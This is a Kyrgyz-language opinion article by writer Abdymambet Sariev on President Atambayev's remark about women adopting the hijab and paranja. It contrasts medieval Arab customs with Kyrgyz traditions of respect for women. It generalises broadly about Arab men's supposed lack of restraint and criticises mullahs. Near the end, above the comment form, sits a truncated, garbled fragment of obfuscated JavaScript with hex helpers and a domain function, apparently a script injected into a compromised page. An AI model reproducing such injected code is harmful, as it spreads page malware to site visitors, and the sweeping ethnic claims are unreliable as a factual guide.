Эмне үчүн араб аялдары чүмкөнүп калышкан?

Кыргыз салты – кыргыздын мыйзамы

IMG_5033

Президент А.Ш.АТАМБАЕВдин:“Биздин аялдар улуттук кийимди кийүүнүн ордуна арабга таандык – паранжа, хиджаб жана башка кийимдерди чүмкөнүп, кие башташты» деген сөзүнө комментарий.

Акыйкатынан алганда арабдардын пайгамбары Мухаммед ошол замандагы араб аялын кордуктан, зордук-зомбулуктан, жок болуудан алып чыккан. Ошол заманда көпчүлүк арабдар кыздарды киши катары көрбөй, туулганда эле тирүүлөй кумга көмүп, өлтүрүп турган.  Ошон үчүн Мухаммед: “Үч кызды аман эсен тарбиялап, чоңойтуп, жайына узатсаң, мен сени менен бейиште бирге боломун” деп насаат айткан. Арабдар ошондон кийин Мухаммед пайгамбар менен бейиште бирге болгусу келип, кыздарды өлтүрбөй калган.

Анын: “Аялзатын көчөгө жалгыз чыгарбагыла, жанында бирөө болсун, бети-башы жабылып, көрүнбөй турсун” деген маанидеги осуяты дагы араб аялын кордуктан, зордуктан арачалап, камкордукка алууга эркектерди мажбур кылган. Себеби, ал замандагы араб эркектери жалгыз-жарым жүргөн аялзатын кордоп, дененин ачык жерин кокус көрүп калса өзүн кармана албай калары айкын болгон. Ошондуктан аялзатын башка эркектерге көрсөтпөй, сугун арттырбай турган ыкманы Мухаммед өз элинин менталитетине ылайыктап, Кудайдын буйругу менен турмуш жүзүнө ашырган.

Мухаммед пайгамбардын: “Энеңе жакшылык кыл, энеңе жакшылык кыл, энеңе жакшылык кыл, анан атаңа жакшылык кыл” дегенинин өзү – мурда энесин аялзаты катары сыйлабаган баласын өз энесин сыйлоого үйрөтүп, аялзатын адам катары көрбөгөн араб эркектерин эсине келтирип, баласы аркылуу энесин коргоого чакырык ташталган.

IMG_4200

“Бейиш эненин таман астында” деген пайгамбардын сөзүндө чоң маани турган. Себеби, иудей, христиан жана ислам диндеринин  элге айткан тарбиялык мааниси да, араб, еврей жана ошол аймактагы элдердин ыйык Библия менен ыйык Курандагы санжыра-тарыхы да түбү бир болгондуктан бейишти убада кылуу, тозок менен коркутуу ыкмасы бирдей болуп, арабдар эңсеген наркы дүйнөдөгү бейиш дагы эненин таман астында экендигин, ошон үчүн аялзаты болгон энени сыйлаган, баккан адам бейишке чыга тургандыгын айтып, Мухаммед пайгамбар акылмандык менен элди эсине келтирип, тартипке салып, оң жолго буруп, араб аялын эркиндикке чыгарып, бактысын ачкан. Кыскасы, арабдын патриархатындагы катаал тартипти матриархаттын пайдасына кандайдыр бир деңгээлде оодарган.

IMG_4040

Ал эми кыргыз элинде аялзатына болгон мамиле таптакыр башкача болгон. Кыргызда кыздарын төрөлөр замат өлтүрүп коймок турсун бапестеп багып, төргө олтургузуп, катуу айтпай, оор жумушка салбай, эркелетип тарбиялоо менен бирге эле жашоо-турмуштун эрежелерине даярдап, “кыз бирөөнүн бүлөсү” деп аздектеп сыйлап, бүт айыл урматтап, кадырлаган. Кыргызда кыз баланы гана эмес, жалпы аялзатын сыйлоо, кадырлоо тартиби күчтүү болгондуктан, “Аял жакшы – эр жакшы…” “Жакшы аял жаман эркекти орто кылат, орто эркекти жакшы кылат” деп жаштарга насаат айтышкан.

Акылдуу, мыкты аялдар эл арасынан суурулуп чыгып, үй-бүлөсүн, айлана-тегерегин, ал гана турсун жалпы аймакты башкарууга себепкер болуп, атак-даңкы эл оозунда айтылган. “Качкан жоону катын алат…” деген улама сөз кыргыздын аялдарынын баатырдыгын, акылмандыгын, жоокердигин даңазалап, карт тарыхтын бетинде жазылып калган.

Кыргызда бир үйдө чогуу жашаганы менен ар бир адамдын аял-эркектик, ата-энелик, туугандык, кошуналык, достук, куда-сөөктүк  жана башка мамилелери жазылбаган мыйзамдын – улуттук каада-салттын, үрп-адаттын эреже, жол-жоболоруна баш ийдирилип, мамилелердин ыйыктыгы көрүнбөгөн чек аралар менен тосулуп, төрөлгөндөн өлгөнгө чейинки жашоо жолунда элди тарбиялоо, бузуктуктан, наадандыктан, акмакчылыктан арачалоо багытында мааниси жагынан диндерден да чоң милдет аткарган.

Улуттук салттын тутумундагы таалим-тарбиянын күчтүүлүгүнөн жана кыргыздын менталитети – Каны-Жаны Кудайдын програмасындагы адалдыкка, актыкка ылайыкташкандыгына байланыштуу кыргызда аял затын көргөндө эле баса калуу, кордоо, сыяктуу тескери сапаттарга Жан Дүйнөсү-Сезими-Акылы аркылуу орун берилген эмес.

Кыргыздын аялзаты жаш курагына жараша жарашыктуу кийим кийип, денесин ачык койбой (азыркыдай тар шым кийип, көчүгүн дыңкыйтпай) бирок, араб аялына окшоп тумчулунбай, эркектерден бекинбей эле жашап, жалпы эл бузуктуктан, наадандыктан алыс болгондуктан аялга андай коркунуч жологон эмес.

“…Биздин аялдар улуттук кийимди кийүүнүн ордуна арабга таандык – паранжа, хиджаб ж.б. кийимдерди чүмкөнүп, кие башташты» деген сөздө терең маани жатат. Орто кылымдагы араб аялын зордук-зомбулуктан сактоо, эркек кишиге жүзүн көрсөтпөө ыкмасына кирген бул кийимдер биздин улуттук жашоо-турмушубузга, кулк-мүнөзүбүзгө-менталитетибизге туура келбейт. Жогоруда айтылгандай, орто кылымдагы араб эркеги аялзатын көрсө эле баса калып кордогондой, байыркы кыргыз эркеги  көчөдөн көрүнгөн эле аялга кордук кылуу жоругун  эч убакта жасаган эмес, азыр да аны жасабайт.

8-1

Молдокелер кыргыздын жалпы эркектерин өзүлөрүн кармай албаган аңгилерге окшотуп,  аялдарга паранжы жаап, хиджап кийгизгени туура эмес жана бул тарбия көргөн, аялзатын сыйлаган, өзүн кармай алган жалпы кыргыз элин кордоо болуп эсептелет.

Экинчиден, кара көйнөк, кара жоолук кыргыз элинде аза күтүүнүн белгиси болуп саналат. Эри же өтө жакыны жаңыдан өлгөнсүп карага оронуп алуу кыргыздын аялзатына жакшылык алып келбейт жана бул жорук ошол аялзатынын жакындарынын азасы менен бүтөт…

Абдымамбет САРИЕВ, жазуучу, коомдук ишмер

Комментарийдин автору туралуу кыскача маалымат:

Абдымамбет САРИЕВ, 1957-жылы туулган, жогорку билимдүү-(1981-1986-ж.ж КМУ, журналистика бөлүмү).КР Улуттук жазуучулар Союзунун Президиумунун жана Башкармасынын мүчөсү. КР Маданият, маалымат жана туризм министрлигинин Байкоочу Кеңешинин мүчөсү, министрликтин Сибирь Федералдык округундагы Алтай крайы жана Алтай Республикасы боюнча коомдук башталыштагы атайын өкүлү–(2011-жылдан бери 200 студенттин Алтай мамлекеттик университетине окууга кирүүсүнө жазуучу К.Качибеков менен биргеликте себепкер болгон). Төлөмүш Океев атындагы Улуттук “Кыргызфильм” киностудиясынын көркөм Кеңешинин мүчөсү, Эл аралык “Нурборбор” чыгармачылык Академиясынын уюштуруучу-координатору, КР Маданиятынын мыкты кызматкери, Кыргызстан (СССР) журналисттер Союзунун мүчөсү, жазуучу, 5 китептин автору.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий кошуу

Сиздин электрондук почтаңыз жарыяланбайт. Милдеттүү талаалар белгиленген *